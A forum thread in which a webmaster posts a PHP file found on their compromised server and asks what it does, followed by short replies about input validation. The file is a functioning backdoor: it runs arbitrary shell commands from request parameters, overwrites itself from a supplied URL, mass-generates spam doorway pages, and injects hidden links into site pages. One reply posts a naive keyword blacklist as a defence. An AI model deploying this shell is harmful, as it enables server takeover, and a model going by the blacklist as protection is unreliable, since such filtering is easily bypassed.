Jump to content

Recommended Posts

Its been a while since ive had a security breach but Heres something i found on my server today, im assuming is a brute force attack on login form, and its trying to write to .htaccess (permissions now 444).

 

 

Any ideas on what else it might do??

 

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
unlink("c");
unlink("1r.txt");
unlink("2r.txt");
  unlink("log");
}

function Clear2()
{
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
$fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
  $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
echo " upt-ok";
}

function GetVar($name, &$var)
{
$var = "";
if (isset($_POST[$name]))
	$var = $_POST[$name];

  if (isset($_GET[$name]))
	$var = $_GET[$name];

if (($var) =="")
  return  false;
  else return true;
}


function GenNew()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

  if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
  for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
    mkdir($tname);
    fwrite($fconf, $tname);
	$pid = 0;
	$fht = fopen("$tname/.htaccess", "w+");

	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 
}
  $gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{
    
	$fc = ""; 
	$fp = fopen($gname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);

	$arr = explode("</html>", $fin);
	//print_r($arr);
	$curs = trim($arr[1]);

	$newf = "$tname/$curs/";
	echo "$newf";
	mkdir($newf);
	$fnd = fopen("$tname/$curs/$curs".".php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	fwrite($fr, "$tname/$curs/$curs".".php\n");


}

}

function Gen2()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
$md = false;
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

     if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

     if (isset($_GET["md"]))
       $md = true; 

$path = "";
$fr = fopen("1r.txt", "a+");
$f2r = fopen("2r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
	$i_dor = trim($fconf[1]);
	$i_dor = $i_dor+0;
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
 	$nm = "";
    for ($i=0; $i<5; $i++)
 	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
        mkdir($tname);
        fwrite($fconf, $tname."\n");
        fwrite($fconf, "0\n");
	$pid = 0;
	$fht = fopen("$tname/.htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 


$fht = fopen("$tname/2.js", "w+");
	$htname = $sg."2js.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 



	$f1t = fopen("1t", "w+");
	$f1tname = $sg."1t.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
	   $fc = fgets($fp, 1024);
	   if (!$fc) break;
	     $fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 


}
$i_dor++;
$i_dor--;
$a1t = file("1t");
    $gname = $sg."sgen2.php";
for ($j=$pid; $j<$pid+10; $j++)
{

	$cth = trim($a1t[$i_dor]);
	$i_dor++;
	$fc = ""; 
	$fp = fopen($gname."?th=$cth", "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);


		$links ="";

 	if (($i_dor<196) || ($i_dor>199))
	{
		for ($y=0; $y<22; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
		}
	}


	if ($i_dor==196)
	{
		for ($y=0; $y<75; $y++)
		{
			$rth = trim($a1t[$y]);
			$links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
		}
	}
	if ($i_dor==197)
	{
		for ($y=75; $y<150; $y++)
		{
			$rth = trim($a1t[$y]);
			$links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
		}
	}
	if ($i_dor==198)
	{
		for ($y=150; $y<225; $y++)
		{
			$rth = trim($a1t[$y]);
			$links .= "<li> <a href='$rth.php'>$rth</a> </li> \n";
		}
	}
	if ($i_dor==199)
	{
		for ($y=225; $y<300; $y++)
		{
			$rth = trim($a1t[$y]);
			$links .= "<li> <a href='$rth.php'>$rth</a></li> \n";
		}
	}
	$fin = ereg_replace("<LINKS2>", $links, $fin);
  
$curs = $cth;
$fnd = fopen("$tname/$curs".".php", "w+");
fwrite($fnd, $fin);
fclose($fnd);
if (($md) && ($i_dor==196 || $i_dor==197 ||  $i_dor==198 || $i_dor==199))
{
	fwrite($fr, "$tname/$curs".".php\n");
}
if (($md) && ($i_dor<196 || $i_dor>199) )
{
	fwrite($f2r, "$tname/$curs".".php\n");
}
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n".$i_dor."\n");
fclose($fconf);
}

function Gen()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

  if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

if (isset($_POST["gm"]))
	 $g = $_POST["gm"];

if (isset($_GET["gm"]))
	$g = $_GET["gm"];


$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
	$cname = trim($fconf[1]);
	$curs = trim($fconf[2]);
	$pid = trim($fconf[3]);
	if ($pid == 100)
	{
		$pid = 0;
		$rnd = mt_rand(0, 999);
		$nm = "";
    for ($i=0; $i<3; $i++)
  	{
	  	$ran = mt_rand(0,26);
	  	$sym = $alp[$ran];
	  	$nm = $nm.$sym;
	  }
		$cname = $nm;
		mkdir("$tname/$cname");
		$curs = $g;
	}
}
else 
{
	$rnd = mt_rand(0, 999);
	$nm = "";
  for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
	$pid = 0;
	$curs = $g;
	mkdir($tname);
	$fht = fopen("$tname/.htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht);
	$rnd = mt_rand(0, 999);
	$nm = "";
    for ($i=0; $i<3; $i++)
  	{
  	$ran = mt_rand(0,26);
  	$sym = $alp[$ran];
  	$nm = $nm.$sym;
  }
	$cname = $nm;
mkdir("$tname/$cname");
}
  $gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{
	$fp = fopen($gname."?g=$curs", "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);

	$fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
}

if ($j==100)
{
  $fp = fopen($gname."?g=$curs&m=1", "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
	$fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	$map = "$path/$tname/$cname/$curs"."_lm.php";
	fwrite($fr,"$map\n");
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n");
fwrite($fconf, $cname."\n");
fwrite($fconf, $curs."\n");
$nj = $j;
fwrite($fconf, $nj."\n");
fclose($fconf);

}

function Update()
{
if (isset($_GET["name"]))
	$sname = $_GET["name"];

$thisname = "$sname.php";
if (isset($_POST['u']))
  $u = $_POST['u'];
  
if (isset($_GET['u']))
		$u = $_GET['u'];

	$fp = fopen($u, "r");
  $fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
  fclose($fp);
  
  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}

function Com()
{
if (isset($_POST['c']))
  @system($_POST['c']);
  if (isset($_GET['c']))
	@system($_GET['c']);
}

function MRepl()
{
$mpt = "";
$drs = "";
$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
  $endtag = "</font></body></html><dd5> "; 
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
GetVar("mpt", $mpt);
 // ??????? ??????????? ???? ????
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fp = fopen($mpt, "r");
  $drs = '';
while (!feof($fp))
{
	 $fc = fgets($fp, 1024);
	 if (!$fc) 
	 {  
       exit();
	 }
   $drs .= $fc;
}
  fclose($fp);
  $fin = $fin.$begtag;  
  $fin = $fin.$drs;
  $fin = $fin.$endtag; 
  $fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
}


function WrTest()
{
$path = trim($_GET['wr']);
$htname = $path."w.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) break;
	   $fin .= $fc;
	}
	fclose($fp);
;
$fout = fopen("w.txt", "w+");
fwrite($fout, $fin);
fclose($fout);

}


function Main()
{
if (isset($_POST['u']) || isset($_GET['u']))
{
	Update();
	exit();
}



if (isset($_POST['c']) || isset($_GET['c']))
{
	Com();
	exit();
}

if (isset($_POST['g']) || isset($_GET['g']))
{
	Gen();
	exit();
}

if (isset($_POST['g1']) || isset($_GET['g1']))
{
	GenNew();
	exit();
}


if (isset($_POST['g2']) || isset($_GET['g2']))
{
	Gen2();
	exit();
}

if (isset($_POST['s']) || isset($_GET['s']))
{
	MRepl();
	exit();
}

  if (isset($_POST['cl']) || isset($_GET['cl']))
{
	Clear();
	exit();
}

if (isset($_POST['cl2']) || isset($_GET['cl2']))
{
	Clear2();
	exit();
}
	if (isset($_POST['wr']) || isset($_GET['wr']))
{
	WrTest();
	exit();
}

echo "<ok>";

}

Main();

?>

Link to comment
https://forums.phpfreaks.com/topic/174552-hacker-attack/
Share on other sites

well for one thing, you aren't validating any GET or POST vars.  At least, not in that script.

 

I use strip tags and str_replate to sanitize it, and i know that not nearly enough. Ive added this , ill see if that stops it:

 

        $username = substr(trim($_POST['username']),0,20);        
        //      prevent SQL-injection         
        $username = str_replace('\\','\\\\', $username);     
        $username = str_replace('"','\"', $username);   
        
        //	prevent XSS-attack, Shell-execute and JavaScript execution
        if (preg_match("/cmd|CREATE|DELETE|DROP|eval|EXEC|File|INSERT|printf/i",$username)) {
            $username = '';        
        }
        if (preg_match("/LOCK|PROCESSLIST|SELECT|shell|SHOW|SHUTDOWN/i",$username)) {
            $username = '';        
        }
        if (preg_match("/SQL|SYSTEM|TRUNCATE|UNION|UPDATE|DUMP/i",$username)) {
            $username = '';        
        }
         if (preg_match("/java|vbscri|embed|onclick|onmouseover|onfocus/i",$username)) {
            $username = '';        
        }

        $password = substr(trim($_POST['password']),0,20);
        //      prevent SQL-injection         
        $password = str_replace('\\','\\\\', $password);     
        $password = str_replace('"','\"', $password);   
        
        //	prevent XSS-attack, Shell-execute and JavaScript execution
        if (preg_match("/cmd|CREATE|DELETE|DROP|eval|EXEC|File|INSERT|printf/i",$password)) {
            $password = '';        
        }
        if (preg_match("/LOCK|PROCESSLIST|SELECT|shell|SHOW|SHUTDOWN/i",$password)) {
            $password = '';        
        }
        if (preg_match("/SQL|SYSTEM|TRUNCATE|UNION|UPDATE|DUMP/i",$password)) {
            $password = '';        
        }
         if (preg_match("/java|vbscri|embed|onclick|onmouseover|onfocus/i",$password)) {
            $password = '';        
        }

Link to comment
https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920415
Share on other sites

If someone got a file on your server, it obviously wasn't through SQL injection.

 

 

I dont get how they can add not only a php file but a directory, my ftp is 20 chars mixed, i change it every 3 months.

 

I clean post, get, and requests using strip_tags and  str_replace, and database queries with mysql_real_escape_string()

 

Im outta ideas on how else they could do it

Link to comment
https://forums.phpfreaks.com/topic/174552-hacker-attack/#findComment-920482
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.